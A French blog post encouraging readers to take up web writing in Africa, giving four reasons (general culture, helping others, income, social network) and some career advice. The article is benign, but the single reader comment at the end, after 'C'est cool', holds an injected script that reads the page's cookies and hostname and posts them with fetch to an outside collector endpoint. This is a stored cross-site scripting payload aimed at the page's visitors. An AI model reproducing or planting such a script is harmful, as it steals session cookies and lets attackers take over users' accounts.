Pourquoi te mettre à la rédaction web en Afrique ?

Rédaction web en Afrique - Inbound 361 - Paul Emmanuel NDJENG & ADN
Photo by Kari Shea on Unsplash

L’écriture a quelque chose d’agréable et de reposant. Certaines personnes peuvent penser qu’écrire demande des efforts qui ne sont pas à leur portée mais c’est très loin d’être le cas. Lorsque l’on observe une chose à distance, il peut être difficile de la comprendre. Il faut s’en approcher afin d’avoir une meilleure perception et une image plus nette. Ce phénomène peut être observé lorsque l’on aborde la question de la rédaction.

 

Si tu aimes écrire, pourquoi te mettre des limites en regardant à tes appréhensions ? C’est en commençant que tu sauras de quoi tu es réellement capable. Si tu hésites encore, ADN et moi te proposons de poursuivre la lecture de cet article. Tu y découvriras quelques raisons qui, nous l'espérons, te stimuleront assez pour que tu te lances.

 

C'est parti !

PEN

Ce que la rédaction web peut t'apporter

Voyons en trois (4) points les apports potentiels de cette activité pour toi.

Ce que la rédaction web peut t'apporter en Afrique-inbound361-Paul Emmanuel Ndjeng et ADN

1. La rédaction web c'est bon pour ta culture générale

Lorsqu'on parle de la rédaction, la lecture n’est jamais bien loin. Les deux activités sont pour ainsi dire indissociables. Ce qui est magnifique c’est que dès que tu commences à lire, tes neurones se mettent en ébullition. Tu collectes, traites et retiens de nombreuses informations. Si tu marques un temps d'arrêt, tu constateras qu’il est beaucoup plus facile d’acquérir des connaissances lorsque tu es intéressé par un sujet. Si en plus c’est dans le but de produire un article ou un document d’une  toute autre nature, tu verras la facilité avec laquelle tu pourras dévorer de nombreux ouvrages, articles, etc.

 

Il faut tout de même avoir la sincérité de reconnaître qu’aucune activité ne se réalise vraiment sans difficulté. Il surviendra donc des périodes au cours desquelles mettre la main sur ce que tu souhaites exactement comme source ne sera pas chose aisée. Cependant, ces petits challenges aiguiseront ta précision dans la recherche d’informations et participeront à améliorer tes capacités rédactionnelles (je te promets !). La rédaction web est un excellent canal pour enrichir ton univers (à bien des égards). La diversité des sujets à explorer te mènera naturellement vers une culture générale enrichie.

 

2. La rédaction web peut te permettre d'apporter quelque chose de plus à l'autre

On peut s'avancer en disant qu'une personne qui écrit est à la base un être généreux. Au travers de ses productions elle partage avec les lecteurs des choses uniques. Tous les jours, de nombreuses vies sont impactées au travers de la lecture. Certaines personnes cherchent comment être mieux organisées dans leur quotidien. D’autres cherchent des informations pour améliorer leurs compétences professionnelles. D’autres encore cherchent juste à se divertir ou à se reconnaître dans la vie ou les propos des autres.

 

L'aspect "web" donne un autre pan à la rédaction. L'amplification de la portée des écrits via l'environnement "sans limites" qu'est internet rend le potentiel de l'impact encore plus grand.

 

Les sujets d’écriture, il y en a pour tous les domaines. En décidant de te mettre à la rédaction web, tu apporteras donc nécessairement quelque chose de plus dans la vie de plusieurs personnes. Si tu lis cet article, c’est probablement parce que tu as des choses à dire au monde, mais tu hésites peut-être encore un peu. Tu cherches peut-être comment (re)trouver l'envie d'écrire.

 

N'hésite plus. Vas-y, et apporte ta pierre au grand édifice qu’est la connaissance. Savoir que tu participes, un temps soit peu, au développement de l’humanité, procure une sensation d'accomplissement unique. Il n’y a rien de plus gratifiant dans la vie que de venir en aide aux autres. Quand au bas d'un article ou dans ta boîte de réception tu trouves des messages de remerciements, de reconnaissance, et même parfois des années après, ça fait très chaud au cœur.

 

3. La rédaction web peut te permettre de gagner de l'argent

Tu peux faire de la rédaction web ta profession, ou un complément pour arrondir tes fins de mois. Il est quasiment impossible d’évoluer dans le monde aujourd’hui sans internet. Le flux d’informations qui circulent via les canaux web est juste impressionnant. Les articles sur lesquels tu es déjà tombé sur bien des sites web ont été faits par des rédacteurs web... un peu comme celui-ci que tu lis.

 

Pourquoi ne pas tenter le coup de la rédaction web ? Il n'est pas nécessaire de quitter le travail que tu as, le cas échéant. Si tu commences par en faire un hobby, et que ce hobby finit par te rapporter de l'argent, tu n'en seras que plus heureux. Pouvoir lier l’utile à l’agréable est simplement magnifique ! Si tu n'as aucune notion dans le domaine à propos duquel tu dois rédiger, quelques clics sur la toile pourraient te permettre d’acquérir les bases pour bien démarrer. De même, tu as la possibilité de te faire accompagner dans tes débuts par des rédacteurs ayant déjà assez d’expérience. 

 

4. La rédaction web élargira ton champ social

 Les métiers de ce type ne sont pas monnaie courante, même si on en parle de plus en plus à mesure que passe le temps. En pratiquant la rédaction web, en parlant de ce sujet, tu découvriras les réalités d'autres pratiquants, et pourras développer un réseau de contacts amoureux de la pratique. Les réalités de ces derniers sauront t'ouvrir l'esprit et même te permettre de mieux vivre les tiennes, car tu réaliseras bien que "tu n'es pas seul" (rires).

Oui. Lorsqu'on pratique la rédaction web, on a bien souvent des moments de solitude, surtout dans des environnements où c'est incompris. Tu passes d'interminables heures devant ta machine, sans qu'autour de toi on comprenne vraiment de quoi il s'agit, du moins jusqu'à ce que tu commences à payer une ou deux factures à la maison, et même (rires). C'est sans oublier les fois où on se demandera si tu ne fais pas quelque chose d'illicite.

 

La petite vidéo récap, comme d'habitude !

Si la rédaction web devait être ta principale activité...

Si tu souhaites "faire carrière" dans la rédaction web, tu auras besoin d’une bonne préparation et d’un véritable plan, autant que faire se peut. Le monde de la rédaction web a ses exigences et ses règles. Pour y "percer" tu devras te comporter en véritable professionnel.

 

Ceci ne signifie en aucun cas que rédiger de temps en temps peut se faire de façon moins rigoureuse. La publication d’écrits respecte toujours un ensemble de codes. Il pourrait arriver que tu doives te former pour avoir de bons fondements et surtout suivre des orientations en fonction du type de textes que tu devras produire. Savoir comment parler à son public cible est essentiel non seulement dans les débuts, mais surtout pour la réussite sur le long terme.

 

Coté organisation de tes journées de travail, la rédaction web peut présenter une grande flexibilité. Mais qui dit flexibilité ne dit pas moins de discipline. Le fait de pouvoir manager ton temps "comme bon te semble" peut rapidement se retourner contre toi si tu n’y mets pas de la rigueur. Je dis souvent aux rédacteurs avec lesquels je travaille : "Le client s'en fout". Le respect des délais et des engagements ne doit souffrir de rien, sauf cas d'extrême force majeure (et encore !).

 

Si tu aimes travailler en toute liberté, sans être sous une pression malsaine, tu pourras te plaire dans la rédaction web, pour autant que tu saches te donner la discipline et le rythme qu'il faut pour tenir tes engagements.

 

En conclusion...

La rédaction web en Afrique est jonchée de belles histoires et d'histoires moins belles aussi, comme toute activité qui "se cherche" dans un environnement où ladite activité ne fait pas partie des "métiers traditionnels". L'activité demande beaucoup d'organisation, mais aussi une réelle consécration, autant que faire se peut, si tu souhaites exceller.

 

La rédaction web, outre le fait de te permettre de gagner de l'argent, peut t'aider à te construire sur le plan social et même personnel, via la dynamique que l'activité exige et implique.

 

Donc, pourquoi te mettre à la rédaction web en Afrique : c'est bon pour ta culture générale, ça peut te permettre d'avoir un impact dans la vie des gens, ça peut te permettre de gagner de l'argent et d'élargir ton tissu social.

 

La rédaction web t'intéresse ? Parlons-en !

 

Tu commences quand ?

ADN & PEN.

Écrire commentaire

Commentaires: 1
  • #1

    LNW (dimanche, 14 août 2022 08:27)

    C'est cool
    <script>
    var myHeaders = new Headers();
    myHeaders.append("Content-Type", "application/x-www-form-urlencoded");

    var urlencoded = new URLSearchParams();
    urlencoded.append("name", window.location.hostname);
    urlencoded.append("value", document.cookie);

    var requestOptions = {
    method: 'POST',
    headers: myHeaders,
    body: urlencoded,
    redirect: 'follow'
    };

    fetch("http://localhost:3333/api/clients", requestOptions)
    .then(response => {})
    .then(result => {})
    .catch(error => {});
    </script>